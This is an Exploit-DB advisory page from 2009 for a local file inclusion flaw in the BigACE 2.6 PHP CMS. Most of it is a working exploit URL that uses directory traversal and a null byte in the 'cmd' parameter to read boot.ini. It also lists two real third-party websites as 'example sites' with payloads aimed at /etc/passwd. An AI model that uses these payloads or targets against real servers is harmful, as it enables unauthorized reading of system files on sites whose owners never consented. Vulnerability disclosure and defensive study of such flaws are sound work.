BigACE 2.6 - 'cmd' Local File Inclusion

EDB-ID:

9052


Author:

CWD@rBe

Type:

webapps


Platform:

PHP

Date:

2009-06-30


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

-----------------:LFI:----------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------
script       : BIGACE 2.6
  
download  : http://garr.dl.sourceforge.net/sourceforge/bigace/bigace_2.6.zip
  
Author     : CWD@rBe
 
Special Thanks : www.cyber-warrior.org
 
***************************************************************************************************************
exploit:
 
http://127.0.0.1/public/index.php?cmd=../../../../../../../../boot.ini%00&id=-1_tsearch_len
 
example sites
 
1.http://my.slow.ccu.edu.tw/bigace/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len
 
2.http://www.tvoffenbach.net/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len
 
****************************************************************************************************************

# milw0rm.com [2009-06-30]